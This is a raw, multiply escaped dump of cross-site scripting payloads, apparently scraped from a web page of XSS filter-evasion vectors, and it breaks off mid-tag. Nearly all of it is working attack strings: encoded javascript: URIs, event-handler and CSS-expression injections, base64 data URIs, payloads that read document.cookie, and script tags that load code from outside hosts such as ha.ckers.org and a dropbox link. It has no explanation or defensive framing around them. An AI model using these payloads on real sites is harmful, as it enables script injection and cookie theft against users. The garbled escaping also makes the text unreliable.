HREF=\\\\\\\&quot;http&amp;#58;//www&amp;#46;gohttp&amp;#58;//www&amp;#46;google&amp;#46;com/ogle&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;\\r\\n%3C\\r\\n&amp;lt\\r\\n&amp;lt;\\r\\n&amp;LT\\r\\n&amp;LT;\\r\\n&amp;#60\\r\\n&amp;#060\\r\\n&amp;#0060\\r\\n&amp;#00060\\r\\n&amp;#000060\\r\\n&amp;#0000060\\r\\n&amp;lt;\\r\\n&amp;#x3c\\r\\n&amp;#x03c\\r\\n&amp;#x003c\\r\\n&amp;#x0003c\\r\\n&amp;#x00003c\\r\\n&amp;#x000003c\\r\\n&amp;#x3c;\\r\\n&amp;#x03c;\\r\\n&amp;#x003c;\\r\\n&amp;#x0003c;\\r\\n&amp;#x00003c;\\r\\n&amp;#x000003c;\\r\\n&amp;#X3c\\r\\n&amp;#X03c\\r\\n&amp;#X003c\\r\\n&amp;#X0003c\\r\\n&amp;#X00003c\\r\\n&amp;#X000003c\\r\\n&amp;#X3c;\\r\\n&amp;#X03c;\\r\\n&amp;#X003c;\\r\\n&amp;#X0003c;\\r\\n&amp;#X00003c;\\r\\n&amp;#X000003c;\\r\\n&amp;#x3C\\r\\n&amp;#x03C\\r\\n&amp;#x003C\\r\\n&amp;#x0003C\\r\\n&amp;#x00003C\\r\\n&amp;#x000003C\\r\\n&amp;#x3C;\\r\\n&amp;#x03C;\\r\\n&amp;#x003C;\\r\\n&amp;#x0003C;\\r\\n&amp;#x00003C;\\r\\n&amp;#x000003C;\\r\\n&amp;#X3C\\r\\n&amp;#X03C\\r\\n&amp;#X003C\\r\\n&amp;#X0003C\\r\\n&amp;#X00003C\\r\\n&amp;#X000003C\\r\\n&amp;#X3C;\\r\\n&amp;#X03C;\\r\\n&amp;#X003C;\\r\\n&amp;#X0003C;\\r\\n&amp;#X00003C;\\r\\n&amp;#X000003C;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\\u003c\\r\\n\\\\u003C\\r\\n&amp;lt;iframe src=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;\\r\\n&amp;lt;SCRIPT SRC=//ha&amp;#46;ckers&amp;#46;org/&amp;#46;js&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js?&amp;lt;B&amp;gt;\\r\\n&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT/SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;BODY onload!#$%&amp;()*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\\\\&amp;#93;^`=alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;gt;\\r\\n&amp;lt;SCRIPT/XSS SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot; javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&amp;lt;SCR\\\\0IPT&amp;gt;alert(\\\\\\\\\\\&quot;XSS\\\\\\\\\\\&quot;)&amp;lt;/SCR\\\\0IPT&amp;gt;\\\\\\\&quot;;\\\&#039; &amp;gt; out\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&amp;lt;IMG SRC=java\\\\0script&amp;#058;alert(\\\\\\\\\\\&quot;XSS\\\\\\\\\\\&quot;)&amp;gt;\\\\\\\&quot;;\\\&#039; &amp;gt; out\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0D;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0A;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x09;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(String&amp;#46;fromCharCode(88,83,83))&amp;gt;\\r\\n&amp;lt;IMG \\\\\\\&quot;\\\\\\\&quot;\\\\\\\&quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=`javascript&amp;#058;alert(\\\\\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\\\\\&quot;)`&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(&amp;quot;XSS&amp;quot;)&amp;gt;\\r\\n&amp;lt;IMG SRC=JaVaScRiPt&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\&#039;\\\&#039;;!--\\\\\\\&quot;&amp;lt;XSS&amp;gt;=&amp;{()}\\r\\n\\\&#039;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\\\\\&quot;;alert(String&amp;#46;fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\\&#039;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String&amp;#46;fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascrscriptipt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;\\r\\n\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\nscriptalert(XSS)/script\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;XSS\\\&quot;)\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(\\\&quot;XSS\\\&quot;))\\\&#039;&gt;\\r\\n&lt;EMBED SRC=\\\&quot;http://ha.ckers.org/xss.swf\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\na=\\\&quot;get\\\&quot;;b=\\\&quot;URL(ja\\\\\\\&quot;\\\&quot;;c=\\\&quot;vascr\\\&quot;;d=\\\&quot;ipt:ale\\\&quot;;e=\\\&quot;rt(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;)\\\&quot;;eval(a+b+c+d+e);\\r\\n&lt;SCRIPT SRC=\\\&quot;http://ha.ckers.org/xss.jpg\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;form id=\\\&quot;test\\\&quot; /&gt;&lt;button form=\\\&quot;test\\\&quot; formaction=\\\&quot;javascript:alert(123)\\\&quot;&gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:alert(123)\\\&quot;&gt;crosssitespt\\r\\n&lt;frameset onload=alert(123)&gt;\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=alert(123)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=alert(123)//\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;script&gt;({0:#0=alert/#0#/#0#(123)})&lt;/script&gt;\\r\\n&lt;script&gt;ReferenceError.prototype.__defineGetter__(\\\&#039;name\\\&#039;, function(){alert(123)}),x&lt;/script&gt;\\r\\n&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\&#039;alert(1)\\\&#039;)()&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;#\\\&quot;&gt;{alert(1)}&lt;/script&gt;;1\\r\\n&lt;script&gt;crypto.generateCRMFRequest(\\\&#039;CN=0\\\&#039;,0,0,null,\\\&#039;alert(1)\\\&#039;,384,null,\\\&#039;rsa-dual-use\\\&#039;)&lt;/script&gt;\\r\\n&lt;svg xmlns=\\\&quot;#\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;\\r\\n&lt;svg onload=\\\&quot;javascript:alert(123)\\\&quot; xmlns=\\\&quot;#\\\&quot;&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\&quot;#\\\&quot; src=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/iframe&gt;\\r\\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\\r\\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\\r\\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\\r\\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\\r\\n%253cscript%253ealert(document.cookie)%253c/script%253e\\r\\n&gt;&lt;s%2bcript&gt;alert(document.cookie)&lt;/script&gt;\\r\\n&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;\\r\\n&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;\\r\\nfoo&lt;script&gt;alert(document.cookie)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n%22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E\\r\\n; alert(document.cookie); var foo=\\r\\nfoo\\\\; alert(document.cookie);//;\\r\\n&lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;\\r\\n&lt;img src=asdf onerror=alert(document.cookie)&gt;\\r\\n&lt;BODY ONLOAD=alert(XSS)&gt;\\r\\n&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;/script&gt;\\r\\n&lt;video src=1 onerror=alert(1)&gt;\\r\\n&lt;audio src=1 onerror=alert(1)&gt;</code> <p>keyword(s): v</p> <p>description: alert&#40;123&#41;;\\r\\nalert&#40;\\\&quot;XSS\\\&quot;&#41;;\\r\\nalert&#40;123&#41;\\r\\nalert&#40;\\\&quot;hellox worldss\\\&quot;&#41;;\\r\\nalert&#40;XSS&#41; \\r\\nalert&#40;XSS&#41;;\\r\\nalert&#40;XSS&#41;\\r\\n&gt;alert&#40;XSS&#41;\\r\\nalert&#40;/XSS&#41;\\r\\nalert&#40;/XSS/&#41;\\r\\nalert&#40;1&#41;\\r\\n; alert&#40;1&#41;;\\r\\n)alert&#40;1&#41;;//\\r\\nalert&#40;1&#41;\\r\\n&lt;IMG SRC=(XSS)&gt;\\r\\n&lt;IMG SRC=(XSS);&gt;\\r\\n&lt;IMG SRC=(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=(XSS)&gt; \\r\\n&lt;img src=xss =alert&#40;1&#41;&gt;\\r\\n\\r\\n\\r\\n&lt;iframe src=\\\&quot;&amp;Tab;(1)&amp;Tab;\\\&quot;&gt;\\r\\n\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/=confirm&#40;1&#41;&gt;\\\&#039;\\r\\n\\r\\n&lt;input/=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n\\r\\n&lt;sVg&gt;&lt;scRipt &gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n\\r\\n&lt;img/src=`` =this.=confirm&#40;1&#41;\\r\\n\\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm&#40;1&#41;\\\&quot;\\r\\n\\r\\n&lt;img src=``&amp;NewLine; =alert&#40;1&#41;&amp;NewLine;\\r\\n\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;\\r\\n\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt&#40;1&#41;&lt;/ScRipT giveanswerhere=?\\r\\n\\r\\n&lt;iframe/src=\\\&quot;PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n\\r\\n&lt;script /**/&gt;/**/alert&#40;1&#41;/**/&lt;/script /**/\\r\\n\\r\\n&amp;#34;&amp;#62;&lt;h1/=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;\\r\\n\\r\\n&lt;iframe/src=\\\&quot;PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\n\\r\\nhttp://www.google&lt;script .com&gt;alert)&lt;/script\\r\\n\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; =prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n\\r\\n&lt;img/src=@&amp;#32;&amp;#13; = prompt&#40;\\\&#039;&amp;#49;\\\&#039;&#41;\\r\\n\\r\\n&lt;style/=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n\\r\\n&lt;script ^__^&gt;alert&#40;String.fromCharCode(49&#41;)&lt;/script ^__^\\r\\n\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert)/**/&lt;/script &amp;#32; :-(\\r\\n\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; =\\\&quot;alert&#40;1&#41;\\\&quot;&gt;\\r\\n\\r\\n&lt;form&gt;&lt;textarea &amp;#13; =\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n\\r\\n&lt;script /***/&gt;/***/confirm&#40;\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;&#41;/***/&lt;/script /***/\\r\\n\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body =prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;(0)\\\&quot; =&amp;NewLine;(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;script ~~~&gt;alert&#40;0%0&#41;&lt;/script ~~~&gt;\\r\\n\\r\\n&lt;style/=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n\\r\\n&lt;///style///&gt;&lt;span %2F =\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; =&amp;Tab;prompt&#40;1&#41;\\r\\n\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/=confirm&#40;1&#41;&gt;\\\&#039;\\r\\n\\r\\n&amp;#13;&lt;blink/&amp;#13; =pr&amp;#x6F;mp&amp;#116;(1)&gt; {Firefox &amp; Opera}\\r\\n\\r\\n&lt;marquee =\\\&#039;;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n\\r\\n&lt;div/style=\\\&quot;width:confirm&#40;1&#41;)\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n\\r\\n&lt;iframe// src=javaSCRIPT&amp;colon;alert&#40;1&#41;\\r\\n\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/=prompt&#40;1&#41; /*iframe/src*/&gt;\\r\\n\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/=this.=confirm&#40;1&#41;&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n\\r\\n&lt;a/href=\\\&quot;;#13; (1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/=prompt&#40;1&#41;\\r\\n\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n\\r\\n&lt;div =\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n\\r\\n&lt;iframe style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; =\\\&quot;prompt&#40;1&#41;\\\&quot;&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n\\r\\n&lt;var =\\\&quot;prompt&#40;1&#41;\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;=\\\&#039;prompt&#40;1&#41;\\\&#039;\\\&quot;&gt;\\r\\n\\r\\n&lt;%&lt;!--\\\&#039;%&gt;alert&#40;1&#41;;&lt;/script --&gt;\\r\\n\\r\\n&lt;script src=\\\&quot;&lt;svg/=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n\\r\\n&lt;iframe/=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n\\r\\n~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n\\r\\n+-+-1-+-+alert&#40;1&#41;\\r\\n\\r\\n&lt;body/=&amp;lt;!--&amp;gt;&amp;#10alert&#40;1&#41;&gt;\\r\\n\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert&#40;1&#41;&lt;/script\\r\\n\\r\\n&lt;img src ?itworksonchrome?\\\\/ = alert&#40;1&#41;\\r\\n\\r\\n&lt;svg&gt;//&amp;NewLine;confirm&#40;1&#41;;&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert&#40;1&#41;\\r\\n\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n\\r\\n&lt;script x&gt; alert&#40;1&#41; &lt;/script 1=2\\r\\n\\r\\n&lt;div/=\\\&#039;alert&#40;1&#41;\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n\\r\\n&lt;--`&lt;img/src=` =alert&#40;1&#41;&gt; --!&gt;\\r\\n &lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;\\r\\n\\r\\n&lt;div style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; =\\\&quot;prompt&#40;1&#41;\\\&quot; =\\\&quot;alert&#40;1&#41;\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\r\\n\\\&quot;&gt;&lt;img src=x =window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert&#40;1&#41;&gt;CLICKME\\r\\n\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n\\r\\n&lt;object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n\\r\\n&lt;iframe src=\\\&quot;PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;IFRAME 